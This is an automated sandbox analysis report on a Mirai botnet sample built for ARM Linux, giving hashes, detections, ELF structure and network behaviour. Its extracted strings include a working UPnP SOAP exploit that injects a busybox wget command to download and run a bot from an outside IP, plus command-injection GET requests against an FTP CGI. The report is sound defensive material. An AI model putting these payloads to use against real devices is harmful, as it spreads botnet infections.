Edit tour

Linux Analysis Report
jkse.arm7.elf

Overview

General Information

Sample name:jkse.arm7.elf
Analysis ID:1643578
MD5:68bcd00c96b9dd6d350430c43abb70ec
SHA1:a55eddd9f3198309be318004e0d0fffa8dc6f17c
SHA256:a3863df857d1db41e97a6f536878b2497522a93265227c066ecfc7ea5d65f61c
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:56
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
Yara detected Mirai
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1643578
Start date and time:2025-03-20 00:33:40 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 10m 24s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:jkse.arm7.elf
Detection:MAL
Classification:mal56.troj.linELF@0/0@2/0
Cookbook Comments:
  • Analysis time extended to 480s due to sleep detection in submitted sample
Command:/tmp/jkse.arm7.elf
PID:5517
Exit Code:255
Exit Code Info:
Killed:False
Standard Output:

Standard Error:/lib/ld-uClibc.so.0: No such file or directory
  • system is lnxubuntu20
  • jkse.arm7.elf (PID: 5517, Parent: 5440, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/jkse.arm7.elf
  • dash New Fork (PID: 5583, Parent: 3670)
  • rm (PID: 5583, Parent: 3670, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.g7VEL5zAe9 /tmp/tmp.jHdrBYAULc /tmp/tmp.ycTIF7paOi
  • dash New Fork (PID: 5584, Parent: 3670)
  • rm (PID: 5584, Parent: 3670, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.g7VEL5zAe9 /tmp/tmp.jHdrBYAULc /tmp/tmp.ycTIF7paOi
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
jkse.arm7.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
    SourceRuleDescriptionAuthorStrings
    5517.1.00007f2a38017000.00007f2a3801f000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
      Process Memory Space: jkse.arm7.elf PID: 5517JoeSecurity_Mirai_6Yara detected MiraiJoe Security
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: jkse.arm7.elfVirustotal: Detection: 48%Perma Link
        Source: jkse.arm7.elfReversingLabs: Detection: 50%
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
        Source: jkse.arm7.elfString found in binary or memory: http://196.251.81.246/a
        Source: jkse.arm7.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: jkse.arm7.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49574
        Source: unknownNetwork traffic detected: HTTP traffic on port 49574 -> 443
        Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 196.251.81.246 -l /tmp/darkbot -r /sh3; /bin/busybox chmod 777 * /tmp/darkbot; /tmp/darkbot)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: Initial samplePotential command found: GET /set_ftp.cgi?loginuse=
        Source: Initial samplePotential command found: GET /ftptest.cgi?loginuse=
        Source: Initial samplePotential command found: GET login.cgi HTTP/1.0
        Source: Initial samplePotential command found: GET /set_ftp.cgi?loginuse=&loginpas=&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28echo+-e+cd+/tmp+>>+/tmp/t%29 HTTP/1.0
        Source: Initial samplePotential command found: GET /ftptest.cgi?loginuse= HTTP/1.0
        Source: ELF static info symbol of initial sample.symtab present: no
        Source: classification engineClassification label: mal56.troj.linELF@0/0@2/0
        Source: /usr/bin/dash (PID: 5583)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.g7VEL5zAe9 /tmp/tmp.jHdrBYAULc /tmp/tmp.ycTIF7paOiJump to behavior
        Source: /usr/bin/dash (PID: 5584)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.g7VEL5zAe9 /tmp/tmp.jHdrBYAULc /tmp/tmp.ycTIF7paOiJump to behavior
        Source: /tmp/jkse.arm7.elf (PID: 5517)Queries kernel information via 'uname': Jump to behavior
        Source: jkse.arm7.elf, 5517.1.00007ffd54731000.00007ffd54752000.rw-.sdmpBinary or memory string: qemu: %s: %s
        Source: jkse.arm7.elf, 5517.1.00007ffd54731000.00007ffd54752000.rw-.sdmpBinary or memory string: leqemu: %s: %s
        Source: jkse.arm7.elf, 5517.1.00007ffd54731000.00007ffd54752000.rw-.sdmpBinary or memory string: Gx86_64/usr/bin/qemu-arm/tmp/jkse.arm7.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/jkse.arm7.elf
        Source: jkse.arm7.elf, 5517.1.0000562333cc4000.0000562333df2000.rw-.sdmpBinary or memory string: 3#Vrg.qemu.gdb.arm.sys.regs">
        Source: jkse.arm7.elf, 5517.1.0000562333cc4000.0000562333df2000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
        Source: jkse.arm7.elf, 5517.1.00007ffd54731000.00007ffd54752000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
        Source: jkse.arm7.elf, 5517.1.0000562333cc4000.0000562333df2000.rw-.sdmpBinary or memory string: rg.qemu.gdb.arm.sys.regs">
        Source: jkse.arm7.elf, 5517.1.0000562333cc4000.0000562333df2000.rw-.sdmpBinary or memory string: 3#V!/etc/qemu-binfmt/arm

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: jkse.arm7.elf, type: SAMPLE
        Source: Yara matchFile source: 5517.1.00007f2a38017000.00007f2a3801f000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: jkse.arm7.elf PID: 5517, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: jkse.arm7.elf, type: SAMPLE
        Source: Yara matchFile source: 5517.1.00007f2a38017000.00007f2a3801f000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: jkse.arm7.elf PID: 5517, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Command and Scripting Interpreter
        Path InterceptionPath Interception1
        File Deletion
        OS Credential Dumping11
        Security Software Discovery
        Remote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        No configs have been found
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Number of created Files
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1643578 Sample: jkse.arm7.elf Startdate: 20/03/2025 Architecture: LINUX Score: 56 12 54.217.10.153, 443, 49574 AMAZON-02US United States 2->12 14 daisy.ubuntu.com 2->14 16 Multi AV Scanner detection for submitted file 2->16 18 Yara detected Mirai 2->18 6 dash rm 2->6         started        8 dash rm 2->8         started        10 jkse.arm7.elf 2->10         started        signatures3 process4

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        jkse.arm7.elf48%VirustotalBrowse
        jkse.arm7.elf50%ReversingLabsLinux.Trojan.Mirai
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches

        Download Network PCAP: filteredfull

        NameIPActiveMaliciousAntivirus DetectionReputation
        daisy.ubuntu.com
        162.213.35.24
        truefalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          http://schemas.xmlsoap.org/soap/encoding/jkse.arm7.elffalse
            high
            http://196.251.81.246/ajkse.arm7.elffalse
              high
              http://schemas.xmlsoap.org/soap/envelope/jkse.arm7.elffalse
                high
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                54.217.10.153
                unknownUnited States
                16509AMAZON-02USfalse
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                54.217.10.153re.bot.mips.elfGet hashmaliciousUnknownBrowse
                  45.126.126.33-sora.arm-2025-03-12T01_48_26.elfGet hashmaliciousMiraiBrowse
                    efea6.elfGet hashmaliciousMiraiBrowse
                      tftp.elfGet hashmaliciousUnknownBrowse
                        arm6.elfGet hashmaliciousUnknownBrowse
                          na.elfGet hashmaliciousPrometeiBrowse
                            nshkarm6.elfGet hashmaliciousUnknownBrowse
                              na.elfGet hashmaliciousPrometeiBrowse
                                sh4.elfGet hashmaliciousMiraiBrowse
                                  arm6.elfGet hashmaliciousMiraiBrowse
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    daisy.ubuntu.comjkse.arm.elfGet hashmaliciousUnknownBrowse
                                    • 162.213.35.25
                                    jkse.ppc.elfGet hashmaliciousUnknownBrowse
                                    • 162.213.35.25
                                    jkse.mips.elfGet hashmaliciousUnknownBrowse
                                    • 162.213.35.25
                                    jkse.mpsl.elfGet hashmaliciousUnknownBrowse
                                    • 162.213.35.25
                                    jkse.x86.elfGet hashmaliciousUnknownBrowse
                                    • 162.213.35.24
                                    .i.elfGet hashmaliciousUnknownBrowse
                                    • 162.213.35.24
                                    i.elfGet hashmaliciousUnknownBrowse
                                    • 162.213.35.25
                                    i.elfGet hashmaliciousUnknownBrowse
                                    • 162.213.35.24
                                    jkse.arm7.elfGet hashmaliciousMiraiBrowse
                                    • 162.213.35.25
                                    jkse.ppc.elfGet hashmaliciousUnknownBrowse
                                    • 162.213.35.24
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    AMAZON-02USSIH Client.exeGet hashmaliciousUnknownBrowse
                                    • 3.5.146.14
                                    https://auth-ca--ndax--console.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                    • 13.33.251.140
                                    jkse.arm.elfGet hashmaliciousUnknownBrowse
                                    • 54.122.24.229
                                    http://pub-a5c199e46db94f72884285a0394a65f2.r2.dev/green-table-top.htmlGet hashmaliciousHTMLPhisherBrowse
                                    • 13.216.34.24
                                    jkse.ppc.elfGet hashmaliciousUnknownBrowse
                                    • 52.16.210.218
                                    http://mmsetscklogin.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                    • 13.33.251.183
                                    bin.sh.elfGet hashmaliciousMiraiBrowse
                                    • 34.249.145.219
                                    http://ajrdn.qqmasonry.com/Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                    • 108.138.106.39
                                    jkse.mips.elfGet hashmaliciousUnknownBrowse
                                    • 54.127.97.231
                                    jkse.mpsl.elfGet hashmaliciousUnknownBrowse
                                    • 52.94.132.43
                                    No context
                                    No context
                                    No created / dropped files found
                                    File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, stripped
                                    Entropy (8bit):5.876715411732662
                                    TrID:
                                    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                    File name:jkse.arm7.elf
                                    File size:31'579 bytes
                                    MD5:68bcd00c96b9dd6d350430c43abb70ec
                                    SHA1:a55eddd9f3198309be318004e0d0fffa8dc6f17c
                                    SHA256:a3863df857d1db41e97a6f536878b2497522a93265227c066ecfc7ea5d65f61c
                                    SHA512:06f49b2fa23a4a4a17ed21dcac9d8c6676822c010b6ee8c7dba47b1fa920b3751912449d477b778c19edfb6ec01bff3fa2b71b5701486a226a49a58677de9fb9
                                    SSDEEP:768:h4Hc3LV6R+Sp3asmggbr3A06xk0Ut4b2Yb8V6m0:RY+Sp37/gH3A0R/VPV6m0
                                    TLSH:E8E28248ED19533AC3E176FFDB9542CF33FA2BC977EA39158231415523C8B54663A620
                                    File Content Preview:.ELF..............(.........4....w......4. ...(.........4...4...4....................................................................s...s...............s...s...s..X....................s...s...s..................Q.td............................/lib/ld-uCl

                                    ELF header

                                    Class:ELF32
                                    Data:2's complement, little endian
                                    Version:1 (current)
                                    Machine:ARM
                                    Version Number:0x1
                                    Type:EXEC (Executable file)
                                    OS/ABI:UNIX - System V
                                    ABI Version:0
                                    Entry Point Address:0x8ed8
                                    Flags:0x4000002
                                    ELF Header Size:52
                                    Program Header Offset:52
                                    Program Header Size:32
                                    Number of Program Headers:6
                                    Section Header Offset:30644
                                    Section Header Size:40
                                    Number of Section Headers:22
                                    Header String Table Index:21
                                    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                    NULL0x00x00x00x00x0000
                                    .interpPROGBITS0x80f40xf40x140x00x2A001
                                    .hashHASH0x81080x1080x22c0x40x2A304
                                    .dynsymDYNSYM0x83340x3340x4600x100x2A414
                                    .dynstrSTRTAB0x87940x7940x2010x00x2A001
                                    .rel.pltREL0x89980x9980x1d00x80x2A374
                                    .initPROGBITS0x8b680xb680x100x00x6AX004
                                    .pltPROGBITS0x8b780xb780x2cc0x40x6AX004
                                    .textPROGBITS0x8e440xe440x5c500x00x6AX004
                                    .finiPROGBITS0xea940x6a940x100x00x6AX004
                                    .rodataPROGBITS0xeaa40x6aa40x8e80x00x2A004
                                    .eh_framePROGBITS0x1738c0x738c0x40x00x3WA004
                                    .init_arrayINIT_ARRAY0x173900x73900x40x00x3WA004
                                    .fini_arrayFINI_ARRAY0x173940x73940x40x00x3WA004
                                    .jcrPROGBITS0x173980x73980x40x00x3WA004
                                    .dynamicDYNAMIC0x1739c0x739c0xb80x80x3WA404
                                    .gotPROGBITS0x174540x74540xf40x40x3WA004
                                    .dataPROGBITS0x175480x75480x9c0x00x3WA004
                                    .bssNOBITS0x175e40x75e40xd4b40x00x3WA004
                                    .commentPROGBITS0x00x75e40x1120x00x0001
                                    .ARM.attributesARM_ATTRIBUTES0x00x76f60x160x00x0001
                                    .shstrtabSTRTAB0x00x770c0xa50x00x0001
                                    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                    PHDR0x340x80340x80340xc00xc02.26870x5R E0x4
                                    INTERP0xf40x80f40x80f40x140x143.68420x4R 0x1/lib/ld-uClibc.so.0.interp
                                    LOAD0x00x80000x80000x738c0x738c5.90540x5R E0x8000.interp .hash .dynsym .dynstr .rel.plt .init .plt .text .fini .rodata
                                    LOAD0x738c0x1738c0x1738c0x2580xd70c3.89910x6RW 0x8000.eh_frame .init_array .fini_array .jcr .dynamic .got .data .bss
                                    DYNAMIC0x739c0x1739c0x1739c0xb80xb82.07000x6RW 0x4.dynamic
                                    GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                    TypeMetaValueTag
                                    DT_NEEDEDsharedliblibc.so.00x1
                                    DT_INITvalue0x8b680xc
                                    DT_FINIvalue0xea940xd
                                    DT_INIT_ARRAYvalue0x173900x19
                                    DT_INIT_ARRAYSZbytes40x1b
                                    DT_FINI_ARRAYvalue0x173940x1a
                                    DT_FINI_ARRAYSZbytes40x1c
                                    DT_HASHvalue0x81080x4
                                    DT_STRTABvalue0x87940x5
                                    DT_SYMTABvalue0x83340x6
                                    DT_STRSZbytes5130xa
                                    DT_SYMENTbytes160xb
                                    DT_DEBUGvalue0x00x15
                                    DT_PLTGOTvalue0x174540x3
                                    DT_PLTRELSZbytes4640x2
                                    DT_PLTRELpltrelDT_REL0x14
                                    DT_JMPRELvalue0x89980x17
                                    DT_NULLvalue0x00x0
                                    NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
                                    .dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                    __bss_end__.dynsym0x24a980NOTYPE<unknown>DEFAULTSHN_ABS
                                    __bss_start.dynsym0x175e40NOTYPE<unknown>DEFAULTSHN_ABS
                                    __bss_start__.dynsym0x175e40NOTYPE<unknown>DEFAULTSHN_ABS
                                    __data_start.dynsym0x175480NOTYPE<unknown>DEFAULT17
                                    __end__.dynsym0x24a980NOTYPE<unknown>DEFAULTSHN_ABS
                                    __errno_location.dynsym0x8d9c32FUNC<unknown>DEFAULTSHN_UNDEF
                                    __exidx_end.dynsym0xf38c0NOTYPE<unknown>DEFAULTSHN_ABS
                                    __exidx_start.dynsym0xf38c0NOTYPE<unknown>DEFAULTSHN_ABS
                                    __uClibc_main.dynsym0x8d24848FUNC<unknown>DEFAULTSHN_UNDEF
                                    _bss_end__.dynsym0x24a980NOTYPE<unknown>DEFAULTSHN_ABS
                                    _edata.dynsym0x175e40NOTYPE<unknown>DEFAULTSHN_ABS
                                    _end.dynsym0x24a980NOTYPE<unknown>DEFAULTSHN_ABS
                                    _exit.dynsym0x8dc0104FUNC<unknown>DEFAULTSHN_UNDEF
                                    _start.dynsym0x8ed880FUNC<unknown>DEFAULT8
                                    abort.dynsym0x8c64296FUNC<unknown>DEFAULTSHN_UNDEF
                                    atoi.dynsym0x8db432FUNC<unknown>DEFAULTSHN_UNDEF
                                    calloc.dynsym0x8c70320FUNC<unknown>DEFAULTSHN_UNDEF
                                    clock.dynsym0x8de452FUNC<unknown>DEFAULTSHN_UNDEF
                                    close.dynsym0x8e08100FUNC<unknown>DEFAULTSHN_UNDEF
                                    connect.dynsym0x8bbc116FUNC<unknown>DEFAULTSHN_UNDEF
                                    exit.dynsym0x8da8196FUNC<unknown>DEFAULTSHN_UNDEF
                                    fcntl.dynsym0x8dfc244FUNC<unknown>DEFAULTSHN_UNDEF
                                    fork.dynsym0x8d18972FUNC<unknown>DEFAULTSHN_UNDEF
                                    free.dynsym0x8e20572FUNC<unknown>DEFAULTSHN_UNDEF
                                    getpid.dynsym0x8be072FUNC<unknown>DEFAULTSHN_UNDEF
                                    getppid.dynsym0x8d6020FUNC<unknown>DEFAULTSHN_UNDEF
                                    getsockname.dynsym0x8e3868FUNC<unknown>DEFAULTSHN_UNDEF
                                    getsockopt.dynsym0x8d8472FUNC<unknown>DEFAULTSHN_UNDEF
                                    htonl.dynsym0x8cf432FUNC<unknown>DEFAULTSHN_UNDEF
                                    htons.dynsym0x8d9016FUNC<unknown>DEFAULTSHN_UNDEF
                                    inet_addr.dynsym0x8ca040FUNC<unknown>DEFAULTSHN_UNDEF
                                    ioctl.dynsym0x8b98224FUNC<unknown>DEFAULTSHN_UNDEF
                                    kill.dynsym0x8c8856FUNC<unknown>DEFAULTSHN_UNDEF
                                    malloc.dynsym0x8c102360FUNC<unknown>DEFAULTSHN_UNDEF
                                    memcpy.dynsym0x8bf84FUNC<unknown>DEFAULTSHN_UNDEF
                                    memmove.dynsym0x8bd44FUNC<unknown>DEFAULTSHN_UNDEF
                                    memset.dynsym0x8d3c156FUNC<unknown>DEFAULTSHN_UNDEF
                                    ntohl.dynsym0x8cac32FUNC<unknown>DEFAULTSHN_UNDEF
                                    ntohs.dynsym0x8d5416FUNC<unknown>DEFAULTSHN_UNDEF
                                    open.dynsym0x8dd8100FUNC<unknown>DEFAULTSHN_UNDEF
                                    prctl.dynsym0x8bec68FUNC<unknown>DEFAULTSHN_UNDEF
                                    printf.dynsym0x8ba476FUNC<unknown>DEFAULTSHN_UNDEF
                                    raise.dynsym0x8e14240FUNC<unknown>DEFAULTSHN_UNDEF
                                    rand.dynsym0x8cd024FUNC<unknown>DEFAULTSHN_UNDEF
                                    read.dynsym0x8ce8100FUNC<unknown>DEFAULTSHN_UNDEF
                                    recv.dynsym0x8bb0112FUNC<unknown>DEFAULTSHN_UNDEF
                                    recvfrom.dynsym0x8c28136FUNC<unknown>DEFAULTSHN_UNDEF
                                    select.dynsym0x8c40132FUNC<unknown>DEFAULTSHN_UNDEF
                                    send.dynsym0x8c58112FUNC<unknown>DEFAULTSHN_UNDEF
                                    sendto.dynsym0x8d00136FUNC<unknown>DEFAULTSHN_UNDEF
                                    setsid.dynsym0x8df064FUNC<unknown>DEFAULTSHN_UNDEF
                                    setsockopt.dynsym0x8cb872FUNC<unknown>DEFAULTSHN_UNDEF
                                    sigaddset.dynsym0x8c4c80FUNC<unknown>DEFAULTSHN_UNDEF
                                    sigemptyset.dynsym0x8bc820FUNC<unknown>DEFAULTSHN_UNDEF
                                    signal.dynsym0x8cdc196FUNC<unknown>DEFAULTSHN_UNDEF
                                    sigprocmask.dynsym0x8e2c140FUNC<unknown>DEFAULTSHN_UNDEF
                                    sleep.dynsym0x8c1c272FUNC<unknown>DEFAULTSHN_UNDEF
                                    socket.dynsym0x8c3468FUNC<unknown>DEFAULTSHN_UNDEF
                                    srand.dynsym0x8d48164FUNC<unknown>DEFAULTSHN_UNDEF
                                    strcat.dynsym0x8c9440FUNC<unknown>DEFAULTSHN_UNDEF
                                    strcmp.dynsym0x8d7828FUNC<unknown>DEFAULTSHN_UNDEF
                                    strcpy.dynsym0x8b8c36FUNC<unknown>DEFAULTSHN_UNDEF
                                    strdup.dynsym0x8d3052FUNC<unknown>DEFAULTSHN_UNDEF
                                    strlen.dynsym0x8dcc96FUNC<unknown>DEFAULTSHN_UNDEF
                                    strstr.dynsym0x8cc4252FUNC<unknown>DEFAULTSHN_UNDEF
                                    strtok.dynsym0x8d0c48FUNC<unknown>DEFAULTSHN_UNDEF
                                    system.dynsym0x8c04132FUNC<unknown>DEFAULTSHN_UNDEF
                                    time.dynsym0x8d6c48FUNC<unknown>DEFAULTSHN_UNDEF
                                    write.dynsym0x8c7c100FUNC<unknown>DEFAULTSHN_UNDEF

                                    Download Network PCAP: filteredfull

                                    • Total Packets: 6
                                    • 443 (HTTPS)
                                    • 53 (DNS)
                                    TimestampSource PortDest PortSource IPDest IP
                                    Mar 20, 2025 00:34:49.075150013 CET49574443192.168.2.1554.217.10.153
                                    Mar 20, 2025 00:34:49.075202942 CET4434957454.217.10.153192.168.2.15
                                    Mar 20, 2025 00:34:49.075294971 CET49574443192.168.2.1554.217.10.153
                                    Mar 20, 2025 00:34:49.076239109 CET49574443192.168.2.1554.217.10.153
                                    Mar 20, 2025 00:34:49.076257944 CET4434957454.217.10.153192.168.2.15
                                    Mar 20, 2025 00:35:49.074357986 CET49574443192.168.2.1554.217.10.153
                                    Mar 20, 2025 00:35:49.116328955 CET4434957454.217.10.153192.168.2.15
                                    TimestampSource PortDest PortSource IPDest IP
                                    Mar 20, 2025 00:37:06.255808115 CET3491453192.168.2.151.1.1.1
                                    Mar 20, 2025 00:37:06.255861998 CET3359453192.168.2.151.1.1.1
                                    Mar 20, 2025 00:37:06.347366095 CET53335941.1.1.1192.168.2.15
                                    Mar 20, 2025 00:37:06.357702017 CET53349141.1.1.1192.168.2.15
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Mar 20, 2025 00:37:06.255808115 CET192.168.2.151.1.1.10xb62dStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                    Mar 20, 2025 00:37:06.255861998 CET192.168.2.151.1.1.10x521eStandard query (0)daisy.ubuntu.com28IN (0x0001)false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Mar 20, 2025 00:37:06.357702017 CET1.1.1.1192.168.2.150xb62dNo error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                                    Mar 20, 2025 00:37:06.357702017 CET1.1.1.1192.168.2.150xb62dNo error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false

                                    System Behavior

                                    Start time (UTC):23:34:21
                                    Start date (UTC):19/03/2025
                                    Path:/tmp/jkse.arm7.elf
                                    Arguments:/tmp/jkse.arm7.elf
                                    File size:4956856 bytes
                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                    Start time (UTC):23:35:47
                                    Start date (UTC):19/03/2025
                                    Path:/usr/bin/dash
                                    Arguments:-
                                    File size:129816 bytes
                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                    Start time (UTC):23:35:47
                                    Start date (UTC):19/03/2025
                                    Path:/usr/bin/rm
                                    Arguments:rm -f /tmp/tmp.g7VEL5zAe9 /tmp/tmp.jHdrBYAULc /tmp/tmp.ycTIF7paOi
                                    File size:72056 bytes
                                    MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                    Start time (UTC):23:35:47
                                    Start date (UTC):19/03/2025
                                    Path:/usr/bin/dash
                                    Arguments:-
                                    File size:129816 bytes
                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                    Start time (UTC):23:35:47
                                    Start date (UTC):19/03/2025
                                    Path:/usr/bin/rm
                                    Arguments:rm -f /tmp/tmp.g7VEL5zAe9 /tmp/tmp.jHdrBYAULc /tmp/tmp.ycTIF7paOi
                                    File size:72056 bytes
                                    MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b